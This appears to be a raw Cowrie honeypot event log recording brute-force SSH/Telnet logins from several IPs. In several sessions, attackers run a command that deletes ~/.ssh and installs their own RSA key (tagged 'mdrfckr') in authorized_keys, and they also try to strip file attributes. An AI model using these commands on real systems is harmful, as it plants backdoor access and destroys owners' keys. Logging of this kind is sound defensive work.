{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:17.076391Z","src_ip":"212.227.235.229","session":"4def01f8f371"}
{"eventid":"cowrie.session.connect","src_ip":"103.77.214.206","src_port":55296,"dst_ip":"1.2.3.4","dst_port":23,"session":"61e84d78c903","protocol":"telnet","message":"New connection: 103.77.214.206:55296 (1.2.3.4:23) [session: 61e84d78c903]","sensor":"my-vps","timestamp":"2025-08-31T05:51:17.243021Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:51:17.677527Z","src_ip":"212.227.235.229","session":"4def01f8f371"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:51:17.678234Z","src_ip":"212.227.235.229","session":"4def01f8f371"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:51:17.969499Z","src_ip":"212.227.235.229","session":"4def01f8f371"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:17.970503Z","src_ip":"212.227.235.229","session":"4def01f8f371"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34728,"dst_ip":"1.2.3.4","dst_port":22,"session":"e62bd0f08d42","protocol":"ssh","message":"New connection: 212.227.235.229:34728 (1.2.3.4:22) [session: e62bd0f08d42]","sensor":"my-vps","timestamp":"2025-08-31T05:51:18.254229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:51:18.255255Z","src_ip":"212.227.235.229","session":"e62bd0f08d42"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:51:18.541745Z","src_ip":"212.227.235.229","session":"e62bd0f08d42"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:51:19.217245Z","src_ip":"212.227.235.229","session":"92ca25f17726"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:51:19.259228Z","src_ip":"212.227.235.229","session":"92ca25f17726"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:51:19.729104Z","src_ip":"212.227.235.229","session":"e62bd0f08d42"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T05:51:20.130201Z","src_ip":"212.227.125.160","session":"1e8381c9a6c0"}
{"eventid":"cowrie.session.connect","src_ip":"103.77.214.206","src_port":44610,"dst_ip":"1.2.3.4","dst_port":23,"session":"0dfc2102a138","protocol":"telnet","message":"New connection: 103.77.214.206:44610 (1.2.3.4:23) [session: 0dfc2102a138]","sensor":"my-vps","timestamp":"2025-08-31T05:51:20.283280Z"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:21.017960Z","src_ip":"212.227.235.229","session":"e62bd0f08d42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36284,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4fc6140bf94","protocol":"ssh","message":"New connection: 212.227.235.229:36284 (1.2.3.4:22) [session: d4fc6140bf94]","sensor":"my-vps","timestamp":"2025-08-31T05:51:21.305805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:51:21.307306Z","src_ip":"212.227.235.229","session":"d4fc6140bf94"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:51:21.595677Z","src_ip":"212.227.235.229","session":"d4fc6140bf94"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:51:22.792316Z","src_ip":"212.227.235.229","session":"d4fc6140bf94"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:23.081926Z","src_ip":"212.227.235.229","session":"d4fc6140bf94"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:23.082833Z","src_ip":"212.227.235.229","session":"4def01f8f371"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57951,"dst_ip":"1.2.3.4","dst_port":22,"session":"6979a3344833","protocol":"ssh","message":"New connection: 212.227.235.229:57951 (1.2.3.4:22) [session: 6979a3344833]","sensor":"my-vps","timestamp":"2025-08-31T05:51:27.281676Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:51:27.294569Z","src_ip":"212.227.235.229","session":"6979a3344833"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:51:27.452592Z","src_ip":"212.227.235.229","session":"6979a3344833"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55416,"dst_ip":"1.2.3.4","dst_port":22,"session":"945a6df80957","protocol":"ssh","message":"New connection: 212.227.235.229:55416 (1.2.3.4:22) [session: 945a6df80957]","sensor":"my-vps","timestamp":"2025-08-31T05:51:31.150147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:51:32.128435Z","src_ip":"212.227.235.229","session":"945a6df80957"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:51:32.129441Z","src_ip":"212.227.235.229","session":"945a6df80957"}
{"eventid":"cowrie.login.success","username":"root","password":"Qi123456.","message":"login attempt [root/Qi123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:51:33.598027Z","src_ip":"212.227.235.229","session":"6979a3344833"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:51:34.387894Z","src_ip":"212.227.235.229","session":"6979a3344833"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:51:34.388629Z","src_ip":"212.227.235.229","session":"6979a3344833"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:51:34.389392Z","src_ip":"212.227.235.229","session":"6979a3344833"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:34.636461Z","src_ip":"212.227.235.229","session":"6979a3344833"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:51:37.462971Z","src_ip":"212.227.235.229","session":"6979a3344833"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:51:37.463642Z","src_ip":"212.227.235.229","session":"6979a3344833"}
{"eventid":"cowrie.login.failed","username":"test2","password":"P@ssw0rd123","message":"login attempt [test2/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:51:37.619137Z","src_ip":"212.227.235.229","session":"945a6df80957"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:51:37.915519Z","src_ip":"212.227.235.229","session":"6979a3344833"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:37.916480Z","src_ip":"212.227.235.229","session":"6979a3344833"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33269,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f37884d95cb","protocol":"ssh","message":"New connection: 212.227.235.229:33269 (1.2.3.4:22) [session: 2f37884d95cb]","sensor":"my-vps","timestamp":"2025-08-31T05:51:38.089201Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:51:39.158402Z","src_ip":"212.227.235.229","session":"2f37884d95cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:51:39.326514Z","src_ip":"212.227.235.229","session":"2f37884d95cb"}
{"eventid":"cowrie.session.closed","duration":"50.2","message":"Connection lost after 50.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:39.345723Z","src_ip":"212.227.125.160","session":"1e8381c9a6c0"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:39.431920Z","src_ip":"212.227.235.229","session":"945a6df80957"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:51:47.586150Z","src_ip":"212.227.235.229","session":"2f37884d95cb"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:48.758425Z","src_ip":"212.227.235.229","session":"2f37884d95cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36596,"dst_ip":"1.2.3.4","dst_port":22,"session":"97f319a83918","protocol":"ssh","message":"New connection: 212.227.235.229:36596 (1.2.3.4:22) [session: 97f319a83918]","sensor":"my-vps","timestamp":"2025-08-31T05:51:48.929142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:51:49.144083Z","src_ip":"212.227.235.229","session":"97f319a83918"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:51:49.311528Z","src_ip":"212.227.235.229","session":"97f319a83918"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59648,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e387e372c02","protocol":"ssh","message":"New connection: 212.227.235.229:59648 (1.2.3.4:22) [session: 0e387e372c02]","sensor":"my-vps","timestamp":"2025-08-31T05:51:49.944302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:51:49.944942Z","src_ip":"212.227.235.229","session":"0e387e372c02"}
